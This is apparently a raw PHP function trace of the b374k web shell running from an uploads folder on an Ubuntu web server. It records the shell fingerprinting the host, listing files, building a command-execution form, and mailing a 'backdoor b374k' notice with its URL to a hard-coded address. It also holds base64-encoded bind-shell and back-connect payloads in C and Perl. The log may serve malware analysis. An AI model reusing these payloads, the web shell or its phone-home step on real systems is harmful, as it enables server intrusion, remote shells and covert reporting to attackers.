2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/">html / </a>'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 43 0 0.007206 693816 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 43 1 0.007224 693848
3 43 R 6
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'uploads/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 44 0 0.007369 693888 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 44 1 0.007387 693920
3 44 R 6
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff = 'Apache/2.4.52 (Ubuntu)<br />'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br />'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= 'uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= 'server ip : 127.0.0.1 <span class="gaya">|</span> your ip : 127.0.0.1<br />'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= 'safemode <span class="gaya">OFF<span><br />'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= ' > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a><a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $port_bind_bd_c = 'bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $port_bind_bd_pl = 'ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8='
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $back_connect = 'fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=='
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $back_connect_c = 'XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw'
3 45 0 0.007611 694400 showdir 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 '/var/www/html/uploads/' 'www-data $ '
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $fname = []
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $dname = []
4 46 0 0.007651 694400 function_exists 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'posix_getpwuid'
4 46 1 0.007666 694440
4 46 R TRUE
4 47 0 0.007679 694400 function_exists 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'posix_getgrgid'
4 47 1 0.007693 694440
4 47 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $posix = TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $user = '????:????'
4 48 0 0.007735 694400 opendir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 48 1 0.007763 694792
4 48 R resource(6) of type (stream)
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $dh = resource(6) of type (stream)
4 49 0 0.007793 694760 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 49 1 0.007820 694832
4 49 R '..'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = '..'
4 50 0 0.007846 694792 is_dir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '..'
4 50 1 0.007865 694840
4 50 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $dname[] = '..'
4 51 0 0.007911 695176 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 51 1 0.007926 695248
4 51 R '.'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = '.'
4 52 0 0.007950 695208 is_dir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.'
4 52 1 0.007966 695248
4 52 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $dname[] = '.'
4 53 0 0.007991 695208 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 53 1 0.008005 695288
4 53 R 'prepend.php'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = 'prepend.php'
4 54 0 0.008030 695248 is_dir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
4 54 1 0.008047 695296
4 54 R FALSE
4 55 0 0.008061 695256 is_file 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
4 55 1 0.008077 695296
4 55 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $fname[] = 'prepend.php'
4 56 0 0.008101 695632 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 56 1 0.008116 695712
4 56 R 'b374k.php'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = 'b374k.php'
4 57 0 0.008141 695672 is_dir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
4 57 1 0.008157 695712
4 57 R FALSE
4 58 0 0.008171 695672 is_file 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
4 58 1 0.008185 695712
4 58 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $fname[] = 'b374k.php'
4 59 0 0.008210 695672 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 59 1 0.008224 695744
4 59 R 'data'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = 'data'
4 60 0 0.008248 695704 is_dir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
4 60 1 0.008264 695736
4 60 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $dname[] = 'data'
4 61 0 0.008288 695696 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 61 1 0.008302 695776
4 61 R '.htaccess'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = '.htaccess'
4 62 0 0.008326 695736 is_dir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
4 62 1 0.008343 695784
4 62 R FALSE
4 63 0 0.008356 695744 is_file 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
4 63 1 0.008370 695784
4 63 R TRUE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $fname[] = '.htaccess'
4 64 0 0.008394 695744 readdir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 64 1 0.008409 695784
4 64 R FALSE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $file = FALSE
4 65 0 0.008433 695744 closedir 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 65 1 0.008453 695560
4 65 R NULL
4 66 0 0.008471 695544 sort 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => 'prepend.php', 1 => 'b374k.php', 2 => '.htaccess']
4 66 1 0.008492 695576
4 66 R TRUE
4 67 0 0.008504 695568 sort 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '..', 1 => '.', 2 => 'data']
4 67 1 0.008520 695600
4 67 R TRUE
4 68 0 0.008533 695568 explode 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
4 68 1 0.008549 696176
4 68 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 0 0.008585 696104 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 1 0.008603 696136
4 69 R 6
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $tree = 6
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $parent = ''
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
4 70 0 0.008685 697384 error_reporting 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 70 1 0.008705 697424
4 70 R 0
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $sub = 'backdoor b374k'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $headers = 'From: k3nz0 \n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $headers .= 'Content-Type: text/plain; charset=iso-8859-1\n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mes .= 'username: ????:????\n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mes .= 'password: \n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mes .= 'URL: /uploads/b374k.php\n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mes .= 'Referer: '
4 71 0 0.008842 697576 mail 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 4 'free.d0ing.1987@gmail.com' 'backdoor b374k' 'username: ????:????\npassword: \nURL: /uploads/b374k.php\nReferer: ' 'From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n'
4 71 1 0.009907 697720
4 71 R FALSE
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $parent .= '/'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $parent .= 'var/'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $parent .= 'www/'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $parent .= 'html/'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
4 72 0 0.010082 697616 fileowner 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.'
4 72 1 0.010109 697648
4 72 R 0
4 73 0 0.010128 697608 posix_getpwuid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 73 1 0.010171 698408
4 73 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 74 0 0.010222 698376 filegroup 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.'
4 74 1 0.010237 698416
4 74 R 0
4 75 0 0.010249 698376 posix_getgrgid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 75 1 0.010275 699032
4 75 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 76 0 0.010335 699256 get_perms 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 0 0.010350 699256 fileperms 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 1 0.010367 699312
5 77 R 16895
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 76 1 0.010489 699312
4 76 R 'rwxrwxrwx'
4 78 0 0.010503 699304 filemtime 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 78 1 0.010518 699344
4 78 R 1676255756
4 79 0 0.010531 699304 date 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676255756
4 79 1 0.010591 701696
4 79 R '12-Feb-2023 21:35'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/uploads/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 21:35</td><td><span id="titik1"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/uploads/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik1\',\'titik1_form\');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hid'
4 80 0 0.010639 701912 fileowner 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '..'
4 80 1 0.010656 701936
4 80 R 0
4 81 0 0.010669 701896 posix_getpwuid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 81 1 0.010695 702696
4 81 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 82 0 0.010737 701896 filegroup 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '..'
4 82 1 0.010752 701936
4 82 R 0
4 83 0 0.010764 701896 posix_getgrgid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 83 1 0.010799 702552
4 83 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 84 0 0.010852 702088 get_perms 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/'
5 85 0 0.010867 702088 fileperms 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/'
5 85 1 0.010883 702136
5 85 R 16895
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 84 1 0.011009 702136
4 84 R 'rwxrwxrwx'
4 86 0 0.011023 702128 filemtime 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/'
4 86 1 0.011037 702168
4 86 R 1676255756
4 87 0 0.011051 702128 date 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676255756
4 87 1 0.011083 702456
4 87 R '12-Feb-2023 21:35'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 21:35</td><td><span id="titik2"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik2\',\'titik2_form\');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" v'
4 88 0 0.011127 702416 fileowner 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
4 88 1 0.011143 702448
4 88 R 0
4 89 0 0.011155 702408 posix_getpwuid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 89 1 0.011179 703208
4 89 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 90 0 0.011222 702408 filegroup 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
4 90 1 0.011235 702448
4 90 R 0
4 91 0 0.011248 702408 posix_getgrgid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 91 1 0.011270 703064
4 91 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 92 0 0.011322 702408 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
5 93 0 0.011336 702408 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 93 1 0.011352 702504
5 93 R 'data'
4 92 1 0.011365 702408
4 92 R 'data'
4 94 0 0.011379 702600 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
5 95 0 0.011392 702600 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 95 1 0.011406 702696
5 95 R 'data'
4 94 1 0.011419 702600
4 94 R 'data'
4 96 0 0.011433 703048 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
5 97 0 0.011446 703048 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 97 1 0.011460 703144
5 97 R 'data'
4 96 1 0.011473 703048
4 96 R 'data'
4 98 0 0.011485 703048 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
5 99 0 0.011498 703048 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 99 1 0.011512 703144
5 99 R 'data'
4 98 1 0.011525 703048
4 98 R 'data'
4 100 0 0.011539 703232 get_perms 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 0 0.011553 703232 fileperms 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 1 0.011569 703296
5 101 R 16895
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 100 1 0.011694 703296
4 100 R 'rwxrwxrwx'
4 102 0 0.011708 703200 filemtime 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
4 102 1 0.011724 703216
4 102 R 1676255756
4 103 0 0.011737 703176 date 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676255756
4 103 1 0.011770 703504
4 103 R '12-Feb-2023 21:35'
4 104 0 0.011784 703176 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
5 105 0 0.011797 703176 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 105 1 0.011812 703272
5 105 R 'data'
4 104 1 0.011825 703176
4 104 R 'data'
4 106 0 0.011838 703304 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'data'
5 107 0 0.011854 703304 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 107 1 0.011869 703400
5 107 R 'data'
4 106 1 0.011884 703304
4 106 R 'data'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="data_link" href="?y=/var/www/html/uploads/data/">[ data ]</a> <form action="?y=/var/www/html/uploads/" method="post" id="data_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="data" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="data" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/.htaccess'
4 108 0 0.011995 704000 fileowner 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
4 108 1 0.012012 704048
4 108 R 0
4 109 0 0.012025 704008 posix_getpwuid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 109 1 0.012050 704808
4 109 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 110 0 0.012093 704008 filegroup 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
4 110 1 0.012107 704048
4 110 R 0
4 111 0 0.012119 704008 posix_getgrgid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 111 1 0.012142 704664
4 111 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
